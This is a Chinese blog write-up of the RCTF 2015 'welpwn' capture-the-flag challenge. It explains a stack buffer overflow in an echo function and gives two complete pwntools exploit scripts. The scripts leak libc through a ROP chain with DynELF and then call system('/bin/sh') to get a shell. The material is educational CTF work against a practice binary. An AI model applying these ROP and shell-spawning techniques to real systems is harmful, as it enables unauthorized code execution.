RCTF - Exploitation 200 welpwn - writeup

最新推荐文章于 2022-12-05 19:36:31 发布
最新推荐文章于 2022-12-05 19:36:31 发布
阅读量2.8k 收藏 2
点赞数 2
分类专栏: pwn pwnable.kr 题解 文章标签: CTF 栈溢出 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SmalOSnail/article/details/53436113
版权

题目来源

RCTF 2015 welpwn
http://oj.xctf.org.cn/files/welpwn_932a4428ea8d4581431502ab7e66ea4b

题目分析

先获取程序的基本信息:
info

然后用ida静态分析程序代码,main函数如下:
main

主函数中read()函数读取了1024个字节的数据,随后调用echo函数:
echo

可以看到echo函数栈桢的大小是20h

echo函数中存在一个循环赋值,循环次数是read函数读的数据的长度,如下图:
vuln

由于echo函数的栈桢大小(20h)远小于read函数可以读取的数据长度(400h),在进行循环赋值的时候,echo函数保存在栈中的返回地址会被覆盖。

下图是输入为"A"*12 + "B"*12 + "C"*4时,程序执行到循环赋值时栈的情况:
overflow

高亮的部分是echo函数的返回地址,它即将被覆盖。
over

解题思路

由于程序设置了栈不可执行,可以构造ROP链,泄露libc中的函数

  1. 泄露libc,获取system,gets等函数地址
  2. 构造gets(bss);'/bin/sh'写入bss
  3. 构造'system("/bin/sh")'得到shell

解题过程

使用Linux_x64中通用的gadgets构造ROP链
gadgets

首先收集一些需要用到的信息,包括bss段的地址、main函数地址、程序中已有函数的地址、gadgets地址……

使用ROPgadgets寻找gadgets(用于构造ROP链):
gad

main函数地址(用作返回地址):
main

bss段开始地址(用于存储字符串’/bin/sh’):
bss

gets(plt)函数地址(用作泄露内存):
gets

构造ROP链,泄露内存:

rop = p64(poprdi) + p64(addr) + p64(puts_plt) + p64(main)

payload = "A" * 24 + p64(ppppr) + rop

利用pwnlibDynELF模块泄露libcsystemputs地址:

def leak(addr):
    rop = p64(poprdi) + p64(addr) + p64(puts_plt) + p64(main)
    payload = "A" * 24 + p64(ppppr) + rop
    p.sendline(payload)
    p.recv(27)
    tmp = p.recv()
    data = tmp.split("\nWelcome")[0]
    if len(data):
        return data
    else:
        return '\x00'

d = DynELF(leak, elf=ELF('welpwn'))

system = d.lookup('system', 'libc')
gets = d.lookup('gets', 'libc')

构造ROP链将'/bin/sh'写入bss段,并执行system("/bin/sh"):

rop = p64(poprdi) + p64(bss) + p64(gets) + p64(poprdi) + p64(bss) + p64(system) + p64(0xdeadbeef)

payload = "A"*24 + p64(ppppr) + rop

解题脚本

这里有两个脚本,第一个是我自己写的,第二个是参考fuchuangbob的脚本。自己写的时候没有想到可以利用pop rdi; ret这个gadgets,写的略显复杂,但是构造ROP链的部分写的比较详细,不熟悉ROP链构造的同学可以看下exp1exp2比较高级,代码也很简练,我从中也学到了不少:D

exp1.py

#!/usr/bin/python 
# only use general gadgets
from pwn import *

p = process('welpwn')
context(arch='amd64', os='linux')

# load program
elf = ELF('welpwn')

# infomation
read_got = elf.symbols['got.read']
log.info("read_got = " + hex(read_got))

write_got = elf.symbols['got.write']
log.info("write_got = " + hex(write_got))

main = elf.symbols['main']
log.info("main = " + hex(main))

# overflow point
buflen = 24

# gadgets
mmmcall = 0x400880
ppppppr = 0x40089a
ppppr = 0x40089c

# junk code
padding = 0xdeadbeef

# need leak libc
# function 1 get system addr
# write(1, address, 8)
flag = 0
def leak(address):
    global flag
    payload = ""
    payload += "Q" * buflen
    payload += p64(ppppr)       
    payload += p64(ppppppr)
    rbx = 0
    rbp = 1
    r12 = write_got
    r13 = 8
    r14 = address
    r15 = 1
    ret = mmmcall
    payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) + p64(ret)
    ret = main
    payload += p64(padding) * 7 + p64(ret)

    p.recvuntil('RCTF\n')
    p.sendline(payload)

    if flag:
        p.recv(0x1b)
    data = p.recv(8)
    log.info("recv: " + str(data))
    flag += 1
    return data

d = DynELF(leak, elf=ELF('welpwn'))

system = d.lookup('system', 'libc')
log.info("system addr = " + hex(system))

#system = 0x7ffff7a60e10
bss = 0x601300
payload = ""
payload += "P" * buflen
payload += p64(ppppr)
payload += p64(ppppppr)
rbx = 0
rbp = 1
r12 = read_got
r13 = 17
r14 = bss
r15 = 0
ret = mmmcall
payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) + p64(ret)
ret = main
payload += p64(padding) * 7 + p64(ret)

p.recvuntil("RCTF\n")
p.sendline(payload)
sleep(1)
p.sendline("/bin/sh\0"+ p64(system))

# # function check bss 
# # write(1, bss, 16)
check = ""
check += "C" * buflen
check += p64(ppppr)
check += p64(ppppppr)
rbx = 0
rbp = 1
r12 = write_got
r13 = 16
r14 = bss
r15 = 1
ret = mmmcall
check += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) + p64(ret)
ret = main
check += p64(padding) * 7 + p64(ret)

p.recvuntil("RCTF\n")
p.sendline(check)
sleep(1)
p.recv(0x1b)
log.info("recv:" + p.recv(16).encode('hex'))

# function 3 get shell
# system(bss)
payload = ""
payload += "R" * buflen
payload += p64(ppppr)
payload += p64(ppppppr)
rbx = 0
rbp = 1
r12 = bss+0x8
r13 = bss
r14 = bss
r15 = bss
ret = mmmcall
payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) + p64(ret)
ret = main
payload += p64(padding) * 7 + p64(ret)

p.recvuntil("RCTF\n")
p.sendline(payload)

sleep(0.5)
p.recv()
p.interactive()

exp2.py

#!/usr/bin/python 
from pwn import *
p = process('welpwn')
#context.log_level = 'debug'
ppppr = 0x40089c
poprdi = 0x4008a3
main = 0x4007cd
puts_plt = 0x4005a0
bss = 0x601070

p.recvuntil("RCTF\n")
def leak(addr):
    rop = p64(poprdi) + p64(addr) + p64(puts_plt) + p64(main)
    payload = "A" * 24 + p64(ppppr) + rop
    p.sendline(payload)
    p.recv(27)
    tmp = p.recv()
    data = tmp.split("\nWelcome")[0]
    if len(data):
        return data
    else:
        return '\x00'

d = DynELF(leak, elf=ELF('welpwn'))
system = d.lookup('system', 'libc')
log.info("system addr = " + hex(system))
gets = d.lookup('gets', 'libc')
log.info("gets addr = " + hex(gets))

# gets(bss); system(bss);
rop = p64(poprdi) + p64(bss) + p64(gets) + p64(poprdi) + p64(bss) + p64(system) + p64(0xdeadbeef)
payload = "A"*24 + p64(ppppr) + rop
p.sendline(payload)
sleep(1)
p.sendline('/bin/sh\0')

p.interactive()

源码下载

https://github.com/TaQini/pwn/tree/master/welpwn

TaQini852
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vmware-exploitation:与VMware转义漏洞相关的链接的集合
05-12
VMware开发与VMware转义漏洞相关的链接的集合。 拉请求是受欢迎的。研究2020年 [文章] [幻灯片] [文章] 撰写的 [文章]2019年“ ESXi的大逃亡”(36C3)[] [ ] 撰写的 [文章] 撰写的 [文章] [纸] 2018年Zisis ...
puts函数泄露地址
Sakura给爷pwn全场
12-17 940
CTF中的PWN——绕CANARY防护3(选择项+PUTS带出CANARY+泄露函数地址计算基地址): https://www.freesion.com/article/5901691025/ 利用puts函数泄露libc内存信息: https://www.it610.com/article/1296102748638486528.htm
ret2shellcode 的泄露puts@got表
wing_7的博客
10-08 1015
现在rip在main+4处没执行puts,执行puts 后可以看到puts_got=> 0X601018里保存的是0X7FFDAA4E5430,可以使用ni si 进行调试看是否前后值有变化。手动设置栈上的值 发现 pop_rdi_ret设置的值 变换为0x4006f3 =》0x7fff004006f3(原因不明)发现[email protected]保存了read函数的blic中的地址。call read—> read的plt表 —>read的got表。jmp到的其实这是plt表对应函数的got表。
RCTF-2015-notsequence WP
qq_41252520的博客
09-05 1417
前言 这道题目有多解,但是只有一组解是flag。再次提醒自己,搞逆向的数学一定要学好,至少大学之前的数学还能有印象! 分析 程序无花无壳,直接IDA反编译。 结构很清晰,分别来看这两个 check 函数。 通过测试可以得知这些 下标 的含义,如果我们用符号来作为输出,就会很清晰了: 然后这个函数检测的就是行 i 的数字之和 v3 = 2i。其实数学好的话,仅看这个函数就立马想到是 杨辉...
RCTF2015 pwn试题分析
weixin_30764137的博客
05-13 156
pwn200 漏洞给的很明显,先是读到了main的局部数组中,然后在子函数中向子函数的局部数组栈里复制。 总体思路是leak system的地址,然后再向一个固定地址写入/bin/sh,最后执行system函数 leak使用pwn库的DynELF实现,整体使用rop链。 1 //ida伪代码 2 int __fastcall echo(__int64 a1) 3 { 4 ...
welpwnRCTF-2015)--write up
ATFWUS的博客
03-12 897
文件下载地址: 链接:https://pan.baidu.com/s/1MG2z9r4wz_WTEz1vIikqJQ 提取码:3tbc 0x01.分析 checksec: 源码分析: 流程非常简单,首先输入一个1024大小字符串,然后进入函数echo,这个函数会将buf的数据一个字节一个字节的复制到s2中,...
android-kernel-exploitation:Android内核开发
03-19
Android内核开发 客观的 本次研讨会的目的是开始在Android平台上进行内核...git clone https://github.com/cloudfuzz/android-kernel-exploitation ~ /workshop Github页面URL 车间流 作者 阿什法克安萨里( 的) 。
Nosql-Exploitation-Framework:用于NoSQL扫描和利用的Python框架
02-03
Nosql开发框架NoSQL扫描和利用框架的框架NoSQL开发框架2.02b发布作者弗朗西斯·亚历山大(Francis Alexander)创建的NoSQL开发框架维基NoSQL Exploitation Framework Wiki的安装和用法-https: 特征: 第一个工具,...
heap-exploitation.pdf
02-01
heap-exploitation.pdf
post-exploitation:有用的脚本和模块
05-26
后开发有用的脚本和模块
32f103rct6系统板pcb图
07-19
stm32f103rct6系统板pcb图
welpwn RCTF-2015 攻防世界
qq_41071646的博客
06-03 1624
参考链接 http://www.purpleroc.com/md/2015-11-17@RCTF-Writeup.html 这个题只是没有想到 找到这个点 然后 攻防世界 给的 so库也有问题 感觉 攻防世界的so环境都是 2.23的鸭 然后我就没有用DynELF 其实 可以在服务器看一下 地址 然后根据 后三位来判断是那个 只不过没有 DynELF 方便 思路就是 构造一个 ...
RCTF2015 welpwn: 200 writeup
fuchuangbob的专栏
06-14 2357
题目:http://oj.xctf.org.cn/files/welpwn_932a4428ea8d4581431502ab7e66ea4b最简单栈溢出,先read 1024字节,然后循环赋值导致栈溢出,循环到\0结束,因此需要构造ROP过掉\0限制: 0x0040089c: pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret ‘A’*24 + p64(0x
pwntools实战CTFpwn
Yale的博客
01-30 2607
Pwntools安装,一条命令就能搞定 pip install --upgrade pwntools 安装完毕后在python环境下只需使用 from pwn import * 即可导入 这会将大量的功能导入到全局命名空间,然后我们就可以直接使用单一的函数进行汇编、反汇编、pack,unpack等操作。 常用的模块有下面几个: asm : 汇编与反汇编,支持x86/x64/arm/mips/pow...
welpwnctf题目
shanwei274的博客
04-06 248
记录一道自己做的ctf题目:welpwnRCTF-2015 1.老生常谈checksec查看: 可以看到只开了nx保护,下面我们进入ida下面看看。 发现是一个想rbp-400,rsp+0h的地方read进入恰好0x400的数据,然后调用了echo函数,我们进入echo看看。 发现了一个简化版的strcpy函数,第一反应溢出溢出!但是这里由于在复制过程中遇到’0x00‘会被截断,所以64位下我们打包的p64(pop_rdi)+p64(binsh_addr)+p64(system)可能复制不到一半就
攻防世界-PWN进阶区-welpwn(RCTF-2015)
weixin_44145820的博客
02-27 1023
题目分析 首先看一下开了哪些保护 因为开了NX,所以考虑使用ROP或者return-into-libc 用IDApro分析一下源代码 可以看出main函数中不存在注入点,我们看一下echo函数 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到...
[攻防世界]-welpwn
m0_55906008的博客
12-05 532
pwn
菜鸟做题记--------welpwnRCTF2015
Return的博客
02-12 486
1.看下保护发现只打开了NX。 [*] 'home/ctf/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 2.拖入IDA看下结果 int __cdecl main(int argc, const char **argv, const char **e
RCTF-2015——welpwn
05-11 306
64位程序 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char buf; // [rsp+0h] [rbp-400h] 4 5 write(1, "Welcome to RCTF\n", 0x10uLL); 6 fflush(_...
nmap --scrip
最新发布
05-20
NSE scripts are used for a variety of purposes such as vulnerability detection, network inventory, and exploitation. The --script option allows users to specify which scripts they want to run. For ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TaQini852

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值